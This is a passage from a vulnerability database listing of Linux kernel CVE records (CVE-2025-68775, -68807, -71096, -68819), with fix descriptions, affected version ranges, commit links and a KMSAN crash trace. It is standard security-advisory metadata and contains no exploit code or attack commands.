"status": "affected",
"version": "6.4"
},
{
"lessThan": "6.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:52.069Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/011ae80c49d9bfa5b4336f8bd387cd25c7593663"
},
{
"url": "https://git.kernel.org/stable/c/e1641177e7fb48a0a5a06658d4aab51da6656659"
},
{
"url": "https://git.kernel.org/stable/c/3c330f1dee3cd92b57e19b9d21dc8ce5970b09be"
},
{
"url": "https://git.kernel.org/stable/c/15564bd67e2975002f2a8e9defee33e321d3183f"
}
],
"title": "net/handshake: duplicate handshake cancellations leak socket",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68775",
"datePublished": "2026-01-13T15:28:52.069Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-13T15:28:52.069Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68807 (GCVE-0-2025-68807)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
VLAI?
EPSS
Title
block: fix race between wbt_enable_default and IO submission
Summary
In the Linux kernel, the following vulnerability has been resolved:
block: fix race between wbt_enable_default and IO submission
When wbt_enable_default() is moved out of queue freezing in elevator_change(),
it can cause the wbt inflight counter to become negative (-1), leading to hung
tasks in the writeback path. Tasks get stuck in wbt_wait() because the counter
is in an inconsistent state.
The issue occurs because wbt_enable_default() could race with IO submission,
allowing the counter to be decremented before proper initialization. This manifests
as:
rq_wait[0]:
inflight: -1
has_waiters: True
rwb_enabled() checks the state, which can be updated exactly between wbt_wait()
(rq_qos_throttle()) and wbt_track()(rq_qos_track()), then the inflight counter
will become negative.
And results in hung task warnings like:
task:kworker/u24:39 state:D stack:0 pid:14767
Call Trace:
rq_qos_wait+0xb4/0x150
wbt_wait+0xa9/0x100
__rq_qos_throttle+0x24/0x40
blk_mq_submit_bio+0x672/0x7b0
...
Fix this by:
1. Splitting wbt_enable_default() into:
- __wbt_enable_default(): Returns true if wbt_init() should be called
- wbt_enable_default(): Wrapper for existing callers (no init)
- wbt_init_enable_default(): New function that checks and inits WBT
2. Using wbt_init_enable_default() in blk_register_queue() to ensure
proper initialization during queue registration
3. Move wbt_init() out of wbt_enable_default() which is only for enabling
disabled wbt from bfq and iocost, and wbt_init() isn't needed. Then the
original lock warning can be avoided.
4. Removing the ELEVATOR_FLAG_ENABLE_WBT_ON_EXIT flag and its handling
code since it's no longer needed
This ensures WBT is properly initialized before any IO can be submitted,
preventing the counter from going negative.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/bfq-iosched.c",
"block/blk-sysfs.c",
"block/blk-wbt.c",
"block/blk-wbt.h",
"block/elevator.c",
"block/elevator.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f55201fb3becff6a903fd29f4d1147cc7e91eb0c",
"status": "affected",
"version": "78c271344b6f64ce24c845e54903e09928cf2061",
"versionType": "git"
},
{
"lessThan": "9869d3a6fed381f3b98404e26e1afc75d680cbf9",
"status": "affected",
"version": "78c271344b6f64ce24c845e54903e09928cf2061",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/bfq-iosched.c",
"block/blk-sysfs.c",
"block/blk-wbt.c",
"block/blk-wbt.h",
"block/elevator.c",
"block/elevator.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.16"
},
{
"lessThan": "6.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix race between wbt_enable_default and IO submission\n\nWhen wbt_enable_default() is moved out of queue freezing in elevator_change(),\nit can cause the wbt inflight counter to become negative (-1), leading to hung\ntasks in the writeback path. Tasks get stuck in wbt_wait() because the counter\nis in an inconsistent state.\n\nThe issue occurs because wbt_enable_default() could race with IO submission,\nallowing the counter to be decremented before proper initialization. This manifests\nas:\n\n rq_wait[0]:\n inflight: -1\n has_waiters: True\n\nrwb_enabled() checks the state, which can be updated exactly between wbt_wait()\n(rq_qos_throttle()) and wbt_track()(rq_qos_track()), then the inflight counter\nwill become negative.\n\nAnd results in hung task warnings like:\n task:kworker/u24:39 state:D stack:0 pid:14767\n Call Trace:\n rq_qos_wait+0xb4/0x150\n wbt_wait+0xa9/0x100\n __rq_qos_throttle+0x24/0x40\n blk_mq_submit_bio+0x672/0x7b0\n ...\n\nFix this by:\n\n1. Splitting wbt_enable_default() into:\n - __wbt_enable_default(): Returns true if wbt_init() should be called\n - wbt_enable_default(): Wrapper for existing callers (no init)\n - wbt_init_enable_default(): New function that checks and inits WBT\n\n2. Using wbt_init_enable_default() in blk_register_queue() to ensure\n proper initialization during queue registration\n\n3. Move wbt_init() out of wbt_enable_default() which is only for enabling\n disabled wbt from bfq and iocost, and wbt_init() isn\u0027t needed. Then the\n original lock warning can be avoided.\n\n4. Removing the ELEVATOR_FLAG_ENABLE_WBT_ON_EXIT flag and its handling\n code since it\u0027s no longer needed\n\nThis ensures WBT is properly initialized before any IO can be submitted,\npreventing the counter from going negative."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:29:14.483Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f55201fb3becff6a903fd29f4d1147cc7e91eb0c"
},
{
"url": "https://git.kernel.org/stable/c/9869d3a6fed381f3b98404e26e1afc75d680cbf9"
}
],
"title": "block: fix race between wbt_enable_default and IO submission",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68807",
"datePublished": "2026-01-13T15:29:14.483Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-13T15:29:14.483Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71096 (GCVE-0-2025-71096)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly
The netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a
LS_NLA_TYPE_DGID attribute, it is invalid if it does not.
Use the nl parsing logic properly and call nla_parse_deprecated() to fill
the nlattrs array and then directly index that array to get the data for
the DGID. Just fail if it is NULL.
Remove the for loop searching for the nla, and squash the validation and
parsing into one function.
Fixes an uninitialized read from the stack triggered by userspace if it
does not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE
query.
BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]
BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
hex_byte_pack include/linux/hex.h:13 [inline]
ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490
ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509
ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633
pointer+0xc09/0x1bd0 lib/vsprintf.c:2542
vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930
vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279
vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426
vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465
vprintk+0x36/0x50 kernel/printk/printk_safe.c:82
_printk+0x17e/0x1b0 kernel/printk/printk.c:2475
ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]
ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141
rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259
netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346
netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
sock_sendmsg_nosec net/socket.c:714 [inline]
__sock_sendmsg+0x333/0x3d0 net/socket.c:729
____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617
___sys_sendmsg+0x271/0x3b0 net/socket.c:2671
__sys_sendmsg+0x1aa/0x300 net/socket.c:2703
__compat_sys_sendmsg net/compat.c:346 [inline]
__do_compat_sys_sendmsg net/compat.c:353 [inline]
__se_compat_sys_sendmsg net/compat.c:350 [inline]
__ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350
ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371
do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]
__do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306
do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331
do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 376f46c8983458ead26cac83aa897a0b78491831
(git)
Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < bfe10318fc23e0b3f1d0a18dad387d29473a624d (git) Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 45532638de5da24c201aa2a9b3dd4b054064de7b (git) Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 9d85524789c2f17c0e87de8d596bcccc3683a1fc (git) Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec (git) Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < 0b948afc1ded88b3562c893114387f34389eeb94 (git) Affected: ae43f8286730d1f2d241c34601df59f6d2286ac4 , < a7b8e876e0ef0232b8076972c57ce9a7286b47ca (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/addr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "376f46c8983458ead26cac83aa897a0b78491831",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "bfe10318fc23e0b3f1d0a18dad387d29473a624d",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "45532638de5da24c201aa2a9b3dd4b054064de7b",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "9d85524789c2f17c0e87de8d596bcccc3683a1fc",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "0b948afc1ded88b3562c893114387f34389eeb94",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
},
{
"lessThan": "a7b8e876e0ef0232b8076972c57ce9a7286b47ca",
"status": "affected",
"version": "ae43f8286730d1f2d241c34601df59f6d2286ac4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/addr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.7"
},
{
"lessThan": "4.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "4.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "4.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly\n\nThe netlink response for RDMA_NL_LS_OP_IP_RESOLVE should always have a\nLS_NLA_TYPE_DGID attribute, it is invalid if it does not.\n\nUse the nl parsing logic properly and call nla_parse_deprecated() to fill\nthe nlattrs array and then directly index that array to get the data for\nthe DGID. Just fail if it is NULL.\n\nRemove the for loop searching for the nla, and squash the validation and\nparsing into one function.\n\nFixes an uninitialized read from the stack triggered by userspace if it\ndoes not provide the DGID to a kernel initiated RDMA_NL_LS_OP_IP_RESOLVE\nquery.\n\n BUG: KMSAN: uninit-value in hex_byte_pack include/linux/hex.h:13 [inline]\n BUG: KMSAN: uninit-value in ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n hex_byte_pack include/linux/hex.h:13 [inline]\n ip6_string+0xef4/0x13a0 lib/vsprintf.c:1490\n ip6_addr_string+0x18a/0x3e0 lib/vsprintf.c:1509\n ip_addr_string+0x245/0xee0 lib/vsprintf.c:1633\n pointer+0xc09/0x1bd0 lib/vsprintf.c:2542\n vsnprintf+0xf8a/0x1bd0 lib/vsprintf.c:2930\n vprintk_store+0x3ae/0x1530 kernel/printk/printk.c:2279\n vprintk_emit+0x307/0xcd0 kernel/printk/printk.c:2426\n vprintk_default+0x3f/0x50 kernel/printk/printk.c:2465\n vprintk+0x36/0x50 kernel/printk/printk_safe.c:82\n _printk+0x17e/0x1b0 kernel/printk/printk.c:2475\n ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:128 [inline]\n ib_nl_handle_ip_res_resp+0x963/0x9d0 drivers/infiniband/core/addr.c:141\n rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]\n rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]\n rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0xf04/0x12b0 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:714 [inline]\n __sock_sendmsg+0x333/0x3d0 net/socket.c:729\n ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2617\n ___sys_sendmsg+0x271/0x3b0 net/socket.c:2671\n __sys_sendmsg+0x1aa/0x300 net/socket.c:2703\n __compat_sys_sendmsg net/compat.c:346 [inline]\n __do_compat_sys_sendmsg net/compat.c:353 [inline]\n __se_compat_sys_sendmsg net/compat.c:350 [inline]\n __ia32_compat_sys_sendmsg+0xa4/0x100 net/compat.c:350\n ia32_sys_call+0x3f6c/0x4310 arch/x86/include/generated/asm/syscalls_32.h:371\n do_syscall_32_irqs_on arch/x86/entry/syscall_32.c:83 [inline]\n __do_fast_syscall_32+0xb0/0x150 arch/x86/entry/syscall_32.c:306\n do_fast_syscall_32+0x38/0x80 arch/x86/entry/syscall_32.c:331\n do_SYSENTER_32+0x1f/0x30 arch/x86/entry/syscall_32.c:3"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:56.896Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/376f46c8983458ead26cac83aa897a0b78491831"
},
{
"url": "https://git.kernel.org/stable/c/bfe10318fc23e0b3f1d0a18dad387d29473a624d"
},
{
"url": "https://git.kernel.org/stable/c/45532638de5da24c201aa2a9b3dd4b054064de7b"
},
{
"url": "https://git.kernel.org/stable/c/9d85524789c2f17c0e87de8d596bcccc3683a1fc"
},
{
"url": "https://git.kernel.org/stable/c/acadd4097d25d6bd472bcb3f9f3eba2b5105d1ec"
},
{
"url": "https://git.kernel.org/stable/c/0b948afc1ded88b3562c893114387f34389eeb94"
},
{
"url": "https://git.kernel.org/stable/c/a7b8e876e0ef0232b8076972c57ce9a7286b47ca"
}
],
"title": "RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71096",
"datePublished": "2026-01-13T15:34:56.118Z",
"dateReserved": "2026-01-13T15:30:19.650Z",
"dateUpdated": "2026-01-19T12:19:56.896Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68819 (GCVE-0-2025-68819)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()
rlen value is a user-controlled value, but dtv5100_i2c_msg() does not
check the size of the rlen value. Therefore, if it is set to a value
larger than sizeof(st->data), an out-of-bounds vuln occurs for st->data.
Therefore, we need to add proper range checking to prevent this vuln.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < c2c293ea7b61f12cdaad1e99a5b4efc58c88960a
(git)
Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < c2305b4c5fc15e20ac06c35738e0578eb4323750 (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < 61f214a878e96e2a8750bf96a98f78c658dba60c (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < 4a54d8fcb093761e4c56eb211cf4e39bf8401fa1 (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < fe3e129ab49806aaaa3f22067ebc75c2dfbe4658 (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < ac92151ff2494130d9fc686055d6bbb9743a673e (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < b91e6aafe8d356086cc621bc03e35ba2299e4788 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/dvb-usb/dtv5100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c2c293ea7b61f12cdaad1e99a5b4efc58c88960a",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "c2305b4c5fc15e20ac06c35738e0578eb4323750",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "61f214a878e96e2a8750bf96a98f78c658dba60c",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "4a54d8fcb093761e4c56eb211cf4e39bf8401fa1",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "fe3e129ab49806aaaa3f22067ebc75c2dfbe4658",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "ac92151ff2494130d9fc686055d6bbb9743a673e",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "b91e6aafe8d356086cc621bc03e35ba2299e4788",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/dvb-usb/dtv5100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.28"
},
{
"lessThan": "2.6.28",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "2.6.28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "2.6.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:23.950Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c2c293ea7b61f12cdaad1e99a5b4efc58c88960a"
},
{
"url": "https://git.kernel.org/stable/c/c2305b4c5fc15e20ac06c35738e0578eb4323750"
},
{
"url": "https://git.kernel.org/stable/c/61f214a878e96e2a8750bf96a98f78c658dba60c"
},
{
"url": "https://git.kernel.org/stable/c/4a54d8fcb093761e4c56eb211cf4e39bf8401fa1"
},
{
"url": "https://git.kernel.org/stable/c/fe3e129ab49806aaaa3f22067ebc75c2dfbe4658"
},
{
